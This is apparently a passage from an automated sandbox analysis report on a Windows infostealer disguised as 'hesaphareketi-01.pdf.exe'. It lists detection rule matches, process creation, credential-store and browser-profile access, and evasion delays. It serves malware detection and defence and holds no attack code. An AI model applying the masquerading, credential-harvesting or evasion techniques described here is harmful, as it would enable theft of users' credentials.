                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.7ff7341d0000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: 0.0.hesaphareketi-01.pdf.exe.7ff7341d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: hesaphareketi-01.pdf.exe | Static PE information: Section: .rsrc ZLIB complexity 0.9963167283298098
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@4/0@2/2
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Code function: 0_2_00007FF7341E2890 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 0_2_00007FF7341E2890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: hesaphareketi-01.pdf.exe | ReversingLabs: Detection: 34%
                        Source: hesaphareketi-01.pdf.exe | Virustotal: Detection: 39%
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | File read: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe
                        Source: unknown | Process created: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe"
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Section loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rtutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edputil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windowscodecs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: hesaphareketi-01.pdf.exe | Static PE information: Image base 0x140000000 > 0x60000000
                        Source: hesaphareketi-01.pdf.exe | Static file information: File size 2066432 > 1048576
                        Source: hesaphareketi-01.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: hesaphareketi-01.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: hesaphareketi-01.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: hesaphareketi-01.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: hesaphareketi-01.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: hesaphareketi-01.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: hesaphareketi-01.pdf.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: hesaphareketi-01.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: hesaphareketi-01.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: hesaphareketi-01.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: hesaphareketi-01.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: hesaphareketi-01.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: hesaphareketi-01.pdf.exe | Static PE information: section name: .managed
                        Source: hesaphareketi-01.pdf.exe | Static PE information: section name: hydrated
                        Source: hesaphareketi-01.pdf.exe | Static PE information: section name: _RDATA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00E50C6D push edi; retf 3_2_00E50C7A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00E50C45 push ebx; retf 3_2_00E50C52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00E50C53 push ebx; retf 3_2_00E50C52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061D940A pushfd ; retf 3_2_061D9419
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061DB521 push es; ret 3_2_061DB530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061D7052 push es; ret 3_2_061D7060

                        Hooking and other Techniques for Hiding and Protection

                        Source: Possible double extension: pdf.exe | Static PE information: hesaphareketi-01.pdf.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory allocated: 2367D880000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: E30000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 2850000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 25C0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599422
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599090
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598422
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597422
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596967
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596859
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596750
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596639
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596510
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596310
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595652
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595437
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595094
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594437
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594218
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594109
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 7449
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 2397
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -27670116110564310s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -600000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599765s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599656s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599547s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599422s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599312s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599203s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -599090s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598765s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598656s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598547s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598422s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598312s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598203s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -598093s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597765s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597656s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597547s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597422s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597312s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597203s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -597093s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -596967s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -596859s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -596750s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -596639s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -596510s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -596310s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -596078s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -595652s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -595547s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -595437s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -595328s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -595219s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -595094s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594765s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594656s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594547s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594437s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594328s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594218s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594109s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744 | Thread sleep time: -594000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Code function: 0_2_00007FF7341E24C0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF7341E24C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599422
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 599090
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598422
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 598093
